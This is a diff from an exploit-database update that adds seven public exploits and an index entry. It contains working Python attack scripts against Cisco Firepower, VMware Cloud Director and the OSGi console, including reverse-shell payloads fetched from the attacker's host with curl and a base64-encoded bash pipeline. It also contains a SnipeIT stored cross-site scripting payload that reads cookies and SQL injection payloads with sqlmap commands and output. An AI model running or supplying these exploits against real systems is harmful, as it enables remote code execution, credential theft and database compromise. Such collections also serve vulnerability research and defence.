DB: 2024-03-13

8 changes to exploits/shellcodes/ghdb

Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE

VMware Cloud Director 10.5 - Bypass identity verification
OSGi v3.7.2 (and below) Console - RCE
OSGi v3.8-3.18 Console - RCE

SnipeIT 6.2.1 - Stored Cross Site Scripting

Client Details System 1.0 - SQL Injection

Human Resource Management System 1.0 - 'employeeid' SQL Injection

exploits/hardware/webapps/51881.py

@@ -0,0 +1,117 @@
+# Exploit Title: [Cisco Firepower Management Center]
+# Google Dork: [non]
+# Date: [12/06/2023]
+# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
+# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]
+# CVE : [CVE-2023-20048]
+
+import requests
+import json
+
+# set the variables for the URL, username, and password for the FMC web services interface
+fmc_url = "https://fmc.example.com"
+fmc_user = "admin"
+fmc_pass = "cisco123"
+
+# create a requests session to handle cookies and certificate verification
+session = requests.Session()
+session.verify = False
+
+# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token
+token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
+response = session.post(token_url, auth=(fmc_user, fmc_pass))
+
+# check the response status and extract the access token and refresh token from the response headers
+# set the access token as the authorization header for the subsequent requests
+try:
+    if response.status_code == 200:
+        access_token = response.headers["X-auth-access-token"]
+        refresh_token = response.headers["X-auth-refresh-token"]
+        session.headers["Authorization"] = access_token
+    else:
+        print("Failed to get tokens, status code: " + str(response.status_code))
+        exit()
+except Exception as e:
+    print(e)
+    exit()
+
+# set the variable for the domain id
+# change this to your domain id
+domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"
+
+# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC
+devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
+response = session.get(devices_url)
+
+# check the response status and extract the data as a json object
+try:
+    if response.status_code == 200:
+        data = response.json()
+    else:
+        print("Failed to get devices, status code: " + str(response.status_code))
+        exit()
+except Exception as e:
+    print(e)
+    exit()
+
+# parse the data to get the list of device names and URLs
+devices = []
+for item in data["items"]:
+    device_name = item["name"]
+    device_url = item["links"]["self"]
+    devices.append((device_name, device_url))
+
+# loop through the list of devices and send a GET request to the URL of each device to get the device details
+for device in devices:
+    device_name, device_url = device
+    response = session.get(device_url)
+
+    # check the response status and extract the data as a json object
+    try:
+        if response.status_code == 200:
+            data = response.json()
+        else:
+            print("Failed to get device details, status code: " + str(response.status_code))
+            continue
+    except Exception as e:
+        print(e)
+        continue
+
+    # parse the data to get the device type, software version, and configuration URL
+    device_type = data["type"]
+    device_version = data["metadata"]["softwareVersion"]
+    config_url = data["metadata"]["configURL"]
+
+    # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability
+    # use the values from the affected products section in the security advisory
+    if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:
+        print("Device " + device_name + " is vulnerable to CVE-2023-20048")
+
+        # create a list of commands that you want to execute on the device
+        commands = ["show version", "show running-config", "show interfaces"]
+        device_id = device_url.split("/")[-1]
+
+        # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device
+        # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute
+        for command in commands:
+            command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command
+            response = session.post(command_url)
+
+            # check the response status and extract the data as a json object
+            try:
+                if response.status_code == 200:
+                    data = response.json()
+                else:
+                    print("Failed to execute command, status code: " + str(response.status_code))
+                    continue
+            except Exception as e:
+                print(e)
+                continue
+
+            # parse the data to get the result of the command execution and print it
+            result = data["result"]
+            print("Command: " + command)
+            print("Result: " + result)
+
+    else:
+        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")

exploits/multiple/remote/51882.py

@@ -0,0 +1,75 @@
+# Exploit Title: [VMware Cloud Director | Bypass identity verification]
+# Google Dork: [non]
+# Date: [12/06/2023]
+# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
+# Version: [10.5]
+# CVE : [CVE-2023-34060]
+import requests
+import paramiko
+import subprocess
+import socket
+import argparse
+import threading
+
+# Define a function to check if a port is open
+def is_port_open(ip, port):
+    # Create a socket object
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    # Set the timeout to 1 second
+    s.settimeout(1)
+    # Try to connect to the port
+    try:
+        s.connect((ip, port))
+        # The port is open
+        return True
+    except:
+        # The port is closed
+        return False
+    finally:
+        # Close the socket
+        s.close()
+
+# Define a function to exploit a vulnerable device
+def exploit_device(ip, port, username, password, command):
+    # Create a ssh client object
+    client = paramiko.SSHClient()
+    # Set the policy to accept any host key
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    # Connect to the target using the credentials
+    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
+    # Execute the command and get the output
+    stdin, stdout, stderr = client.exec_command(command)
+    # Print the output
+    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
+    # Close the ssh connection
+    client.close()
+
+
+# Parse the arguments from the user
+parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
+parser.add_argument("ip", help="The target IP address")
+parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
+parser.add_argument("-u", "--username", default="root", help="The username for ssh")
+parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
+parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
+args = parser.parse_args()
+
+# Loop through the ports and check for the vulnerability
+for port in args.ports:
+    # Check if the port is open
+    if is_port_open(args.ip, port):
+        # The port is open, send a GET request to the port and check the status code
+        response = requests.get(f"http://{args.ip}:{port}")
+        if response.status_code == 200:
+            # The port is open and vulnerable
+            print(f"Port {port} is vulnerable to CVE-2023-34060")
+            # Create a thread to exploit the device
+            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
+            # Start the thread
+            thread.start()
+        else:
+            # The port is open but not vulnerable
+            print(f"Port {port} is not vulnerable to CVE-2023-34060")
+    else:
+        # The port is closed
+        print(f"Port {port} is closed")

exploits/multiple/webapps/51878.py

@@ -0,0 +1,290 @@
+#!/usr/bin/python
+
+# Exploit Title: [OSGi v3.8-3.18 Console RCE]
+# Date: [2023-07-28]
+# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
+#                  VisionSpace Technologies GmbH]
+# Exploit Repository:
+#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]
+# Vendor Homepage: [https://eclipse.dev/equinox]
+# Software Link: [https://archive.eclipse.org/equinox/]
+# Version: [3.8 - 3.18]
+# Tested on: [Linux kali 6.3.0-kali1-amd64]
+# License: [MIT]
+#
+# Usage:
+# python exploit.py --help
+#
+# Example:
+# python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \
+#                                                      --lport=4444
+
+"""
+This is an exploit that allows to open a reverse shell connection from
+the system running OSGi v3.8-3.18 and earlier.
+"""
+import argparse
+import socket
+import sys
+import threading
+
+from functools import partial
+from http.server import BaseHTTPRequestHandler, HTTPServer
+
+# Stage 1 of the handshake message
+HANDSHAKE_STAGE_1 = \
+    b"\xff\xfd\x01\xff\xfd" \
+    b"\x03\xff\xfb\x1f\xff" \
+    b"\xfa\x1f\x00\x74\x00" \
+    b"\x37\xff\xf0\xff\xfb" \
+    b"\x18"
+
+# Stage 2 of the handshake message
+HANDSHAKE_STAGE_2 = \
+    b"\xff\xfa\x18\x00\x58" \
+    b"\x54\x45\x52\x4d\x2d" \
+    b"\x32\x35\x36\x43\x4f" \
+    b"\x4c\x4f\x52\xff\xf0"
+
+# The buffer of this size is enough to handle the telnet handshake
+BUFFER_SIZE = 2 * 1024
+
+
+class HandlerClass(BaseHTTPRequestHandler):
+    """
+    This class overrides the BaseHTTPRequestHandler. It provides a specific
+    functionality used to deliver a payload to the target host.
+    """
+
+    _lhost: str
+    _lport: int
+
+    def __init__(self, lhost, lport, *args, **kwargs):
+        self._lhost = lhost
+        self._lport = lport
+
+        super().__init__(*args, **kwargs)
+
+    def _set_response(self):
+        self.send_response(200)
+        self.send_header("Content-type", "text/html")
+        self.end_headers()
+
+    def do_GET(self):  # pylint: disable=C0103
+        """
+        This method is responsible for the playload delivery.
+        """
+
+        print("Delivering the payload...")
+
+        self._set_response()
+        self.wfile.write(generate_revshell_payload(
+            self._lhost, self._lport).encode('utf-8'))
+
+        raise KeyboardInterrupt
+
+    def log_message(self, format, *args):  # pylint: disable=W0622
+        """
+        This method redefines a built-in method to suppress
+        BaseHTTPRequestHandler log messages.
+        """
+
+        return
+
+
+def generate_revshell_payload(lhost, lport):
+    """
+    This function generates the Revershe Shell payload that will
+    be executed on the target host.
+    """
+
+    payload = \
+        "import java.io.IOException;import java.io.InputStream;" \
+        "import java.io.OutputStream;import java.net.Socket;" \
+        "class RevShell {public static void main(String[] args) " \
+        "throws Exception { String host=\"%s\";int port=%d;" \
+        "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \
+        "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \
+        "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \
+        "si=s.getInputStream();OutputStream po=p.getOutputStream()," \
+        "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \
+        ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \
+        "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \
+        "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \
+        "p.destroy();s.close();}}\n" % (
+            lhost, lport)
+
+    return payload
+
+
+def run_payload_delivery(lhost, lport):
+    """
+    This function is responsible for payload delivery.
+    """
+
+    print("Setting up the HTTP server for payload delivery...")
+
+    handler_class = partial(HandlerClass, lhost, lport)
+
+    server_address = ('', 80)
+    httpd = HTTPServer(server_address, handler_class)
+
+    try:
+        print("[+] HTTP server is running.")
+
+        httpd.serve_forever()
+    except KeyboardInterrupt:
+        print("[+] Payload delivered.")
+    except Exception as err:  # pylint: disable=broad-except
+        print("[-] Failed payload delivery!")
+        print(err)
+    finally:
+        httpd.server_close()
+
+
+def generate_stage_1(lhost):
+    """
+    This function generates the stage 1 of the payload.
+    """
+
+    stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (
+        lhost.encode()
+    )
+
+    return stage_1
+
+
+def generate_stage_2():
+    """
+    This function generates the stage 2 of the payload.
+    """
+
+    stage_2 = b"fork \"java ./RevShell.java\"\n"
+
+    return stage_2
+
+
+def establish_connection(rhost, rport):
+    """
+    This function creates a socket and establishes the connection
+    to the target host.
+    """
+
+    print("[*] Connecting to OSGi Console...")
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.connect((rhost, rport))
+    print("[+] Connected.")
+
+    return sock
+
+
+def process_handshake(sock):
+    """
+    This function process the handshake with the target host.
+    """
+
+    print("[*] Processing the handshake...")
+    sock.recv(BUFFER_SIZE)
+    sock.send(HANDSHAKE_STAGE_1)
+    sock.recv(BUFFER_SIZE)
+    sock.send(HANDSHAKE_STAGE_2)
+    sock.recv(BUFFER_SIZE)
+    sock.recv(BUFFER_SIZE)
+
+
+def deliver_payload(sock, lhost):
+    """
+    This function executes the first stage of the exploitation.
+    It triggers the payload delivery mechanism to the target host.
+    """
+
+    stage_1 = generate_stage_1(lhost)
+
+    print("[*] Triggering the payload delivery...")
+    sock.send(stage_1)
+    sock.recv(BUFFER_SIZE)
+    sock.recv(BUFFER_SIZE)
+
+
+def execute_payload(sock):
+    """
+    This function executes the second stage of the exploitation.
+    It sends payload which is responsible for code execution.
+    """
+
+    stage_2 = generate_stage_2()
+
+    print("[*] Executing the payload...")
+    sock.send(stage_2)
+    sock.recv(BUFFER_SIZE)
+    sock.recv(BUFFER_SIZE)
+    print("[+] Payload executed.")
+
+
+def exploit(args, thread):
+    """
+    This function sends the multistaged payload to the tareget host.
+    """
+
+    try:
+        sock = establish_connection(args.rhost, args.rport)
+
+        process_handshake(sock)
+        deliver_payload(sock, args.lhost)
+
+        # Join the thread running the HTTP server
+        # and wait for payload delivery
+        thread.join()
+
+        execute_payload(sock)
+
+        sock.close()
+
+        print("[+] Done.")
+    except socket.error as err:
+        print("[-] Could not connect!")
+        print(err)
+        sys.exit()
+
+
+def parse():
+    """
+    This fnction is used to parse and return command-line arguments.
+    """
+
+    parser = argparse.ArgumentParser(
+        prog="OSGi-3.8-console-RCE",
+        description="This tool will let you open a reverse shell from the "
+                    "system that is running OSGi with the '-console' "
+                    "option in versions between 3.8 and 3.18.",
+        epilog="Happy Hacking! :)",
+    )
+
+    parser.add_argument("--rhost", dest="rhost",
+                        help="remote host", type=str, required=True)
+    parser.add_argument("--rport", dest="rport",
+                        help="remote port", type=int, required=True)
+    parser.add_argument("--lhost", dest="lhost",
+                        help="local host", type=str, required=False)
+    parser.add_argument("--lport", dest="lport",
+                        help="local port", type=int, required=False)
+    parser.add_argument("--version", action="version",
+                        version="%(prog)s 0.1.0")
+
+    return parser.parse_args()
+
+
+def main(args):
+    """
+    Main fuction.
+    """
+
+    thread = threading.Thread(
+        target=run_payload_delivery, args=(args.lhost, args.lport))
+    thread.start()
+
+    exploit(args, thread)
+
+
+if __name__ == "__main__":
+    main(parse())

exploits/multiple/webapps/51879.py

@@ -0,0 +1,144 @@
+#!/usr/bin/python
+
+# Exploit Title: [OSGi v3.7.2 Console RCE]
+# Date: [2023-07-28]
+# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
+#                  VisionSpace Technologies GmbH]
+# Exploit Repository:
+#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]
+# Vendor Homepage: [https://eclipse.dev/equinox]
+# Software Link: [https://archive.eclipse.org/equinox/]
+# Version: [3.7.2 and before]
+# Tested on: [Linux kali 6.3.0-kali1-amd64]
+# License: [MIT]
+#
+# Usage:
+# python exploit.py --help
+#
+# Examples:
+# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \
+#   --lport=4444
+#
+# python exploit.py --rhost=localhost --rport=1337 --payload= \
+#   "curl http://192.168.100.100/osgi_test"
+
+
+"""
+This is an exploit that allows to open a reverse shell connection from
+the system running OSGi v3.7.2 and earlier.
+"""
+import argparse
+import base64
+import socket
+
+
+def parse():
+    """
+    This fnction is used to parse and return command-line arguments.
+    """
+
+    parser = argparse.ArgumentParser(
+        prog="OSGi-3.7.2-console-RCE",
+        description="This tool will let you open a reverse shell from the "
+                    "system that is running OSGi with the '-console' "
+                    "option in version 3.7.2 (or before).",
+        epilog="Happy Hacking! :)",
+    )
+
+    parser.add_argument("--rhost", dest="rhost",
+                        help="remote host", type=str, required=True)
+    parser.add_argument("--rport", dest="rport",
+                        help="remote port", type=int, required=True)
+    parser.add_argument("--lhost", dest="lhost",
+                        help="local host", type=str, required=False)
+    parser.add_argument("--lport", dest="lport",
+                        help="local port", type=int, required=False)
+    parser.add_argument("--payload", dest="custom_payload",
+                        help="custom payload", type=str, required=False)
+    parser.add_argument("--version", action="version",
+                        version="%(prog)s 0.1.0")
+
+    args = parser.parse_args()
+
+    if args.custom_payload and (args.lhost or args.lport):
+        parser.error(
+            "either --payload or both --lport and --rport are required.")
+
+    return args
+
+
+def generate_payload(lhost, lport, custom_payload):
+    """
+    This function generates the whole payload ready for the delivery.
+    """
+
+    payload = ""
+
+    if custom_payload:
+        payload = custom_payload
+
+        print("(*) Using custom payload.")
+    elif lhost and lport:
+        payload = \
+            "echo 'import java.io.IOException;import java.io.InputStream;" \
+            "import java.io.OutputStream;import java.net.Socket;class Rev" \
+            "Shell {public static void main(String[] args) throws Excepti" \
+            "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \
+            "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \
+            ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \
+            "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \
+            "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \
+            ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \
+            "e(pe.available()>0)so.write(pe.read());while(si.available()>" \
+            "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \
+            ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \
+            ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (
+                lhost, lport)
+
+        print("(+) Using Java reverse shell payload.")
+
+    bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (
+        base64.b64encode(payload.encode()))
+
+    wrapped_payload = b"fork \"%s\"\n" % (bash_payload)
+
+    return wrapped_payload
+
+
+def deliver_payload(rhost, rport, payload):
+    """
+    This function connects to the target host and delivers the payload.
+    It returns True if successful; False otherwise.
+    """
+
+    print("(*) Sending payload...")
+
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.connect((rhost, rport))
+        sock.send(payload)
+        sock.close()
+    except socket.error as err:
+        print(f"(-) Could not deliver the payload to {rhost}:{rport}!")
+        print(err)
+        return False
+
+    return True
+
+
+def main(args):
+    """
+    Main function.
+    """
+
+    payload = generate_payload(args.lhost, args.lport, args.custom_payload)
+
+    success = deliver_payload(args.rhost, args.rport, payload)
+    if success:
+        print("(+) Done.")
+    else:
+        print("(-) Finished with errors.")
+
+
+if __name__ == "__main__":
+    main(parse())

exploits/multiple/webapps/51883.txt

@@ -0,0 +1,56 @@
+Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting
+Date: 06-Oct-2023
+Exploit Author: Shahzaib Ali Khan
+Vendor Homepage: https://snipeitapp.com
+Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1
+Version: 6.2.1
+Tested on: Windows 11 22H2 and Ubuntu 20.04
+CVE: CVE-2023-5452
+
+Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting
+(XSS) feature that allows attackers to execute JavaScript commands. The
+location endpoint was vulnerable.
+
+Steps to Reproduce:
+
+1. Login as a standard user [non-admin] > Asset page > List All
+2. Click to open any asset > Edit Asset
+3. Create new location and add the payload:
+<script>alert(document.cookie)</script>
+4. Now login to any other non-admin or admin > Asset page > List All
+5. Open the same asset of which you can change the location and the payload
+will get executed.
+
+POC Request:
+
+POST /api/v1/locations HTTP/1.1
+Host: localhost
+Content-Length: 118
+Accept: */*
+X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://localhost
+Referer: http://localhost/hardware/196/edit
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;
+assetsListingTable.bs.table.cardView=false; laravel_token=
+eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3
+ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM
+d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0
+01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;
+XSRF-TOKEN=
+eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH
+FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5
+MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D
+Connection: close
+
+name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=
+
+
+
+Thanks,
+Shahzaib Ali Khan

exploits/php/webapps/51877.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Human Resource Management System - SQL Injection
+# Date: 13-01-2024
+# Exploit Author: Srikar ( Exp1o1t9r )
+# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
+# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
+# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
+# Version: 1.0 (Monday, October 10, 2022 - 13:37)
+# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0
+# Vulnerable URL and Parameter:URL:
+
+
+Parameter: employeeid=2 The following payloads successfully identified SQL injection
+vulnerabilities:
+employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT
+6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT
+(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT
+7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION
+ALL SELECT
+NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
+- *
+
+# Response:MySQL: 10.4.32-MariaDB
+Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*

exploits/php/webapps/51880.txt

@@ -0,0 +1,72 @@
++ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1
++ **Date:** 2023-26-12
++ **Exploit Author:** Hamdi Sevben
++ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/
++ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip
++ **Version:** 1.0
++ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53
++ **CVE:** CVE-2023-7137
+
+## References:
++ **CVE-2023-7137:** https://vuldb.com/?id.249140
++ https://www.cve.org/CVERecord?id=CVE-2023-7137
++ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137
++ https://nvd.nist.gov/vuln/detail/CVE-2023-7137
+
+## Description:
+Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data,  or exploit latest vulnerabilities in the underlying database.
+
+## Proof of Concept:
++ Go to the User Login page: "http://localhost/clientdetails/"
++ Fill email and password.
++ Intercept the request via Burp Suite and send to Repeater.
++ Copy and paste the request to a "r.txt" file.
++ Captured Burp request:
+```
+POST /clientdetails/ HTTP/1.1
+Host: localhost
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Content-Length: 317
+Content-Type: application/x-www-form-urlencoded
+Referer: http://localhost/clientdetails/
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+
+uemail=user@mail.com&login=LOG+IN&password=P@ass123
+```
+
++ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database.
+```
+python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db
+```
+
+```
+---
+Parameter: uemail (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+    Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 7 columns
+    Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123
+---
+[14:58:11] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.53, PHP, PHP 8.1.6
+back-end DBMS: MySQL >= 5.0 (MariaDB fork)
+[14:58:11] [INFO] fetching current database
+current database: 'loginsystem'
+```
+
++ current database: `loginsystem`
+![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)

files_exploits.csv

@@ -4165,6 +4165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30362,exploits/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-16,2013-12-16,0,CVE-2013-6976;OSVDB-101097,,,,,
 30415,exploits/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-22,2013-12-22,0,CVE-2013-6976;OSVDB-101097,,,,,
 46263,exploits/hardware/webapps/46263.txt,"Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting",2019-01-28,"Bhushan B. Patil",webapps,hardware,443,2019-01-28,2019-01-30,1,CVE-2019-1642,"Cross-Site Scripting (XSS)",,,,
+51881,exploits/hardware/webapps/51881.py,"Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE",2024-03-12,"Abdualhadi khalifa",webapps,hardware,,2024-03-12,2024-03-12,0,,,,,,
 25292,exploits/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,webapps,hardware,,2013-05-07,2016-10-27,0,CVE-2013-2684;CVE-2013-2683;CVE-2013-2682;CVE-2013-2681;CVE-2013-2680;CVE-2013-2679;CVE-2013-2678;OSVDB-93065;OSVDB-93064;OSVDB-93063;OSVDB-93062;OSVDB-93061;OSVDB-93060;OSVDB-93059;OSVDB-89911,,,,,
 16252,exploits/hardware/webapps/16252.html,"Cisco Linksys WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",webapps,hardware,,2011-02-26,2011-02-26,0,OSVDB-71032,,,,,
 18503,exploits/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - Cross-Site Request Forgery (Change Admin Password)",2012-02-21,"Ivano Binetti",webapps,hardware,,2012-02-21,2012-02-21,0,OSVDB-80809,,,,,
@@ -11528,6 +11529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/3220fa6a56c61cf53652e98356f94e0c6a833cd3/Vitek_RCE_and_information_disclosure.txt
 44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/96892a5e7d513298b3181265055d437753dbaa55/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
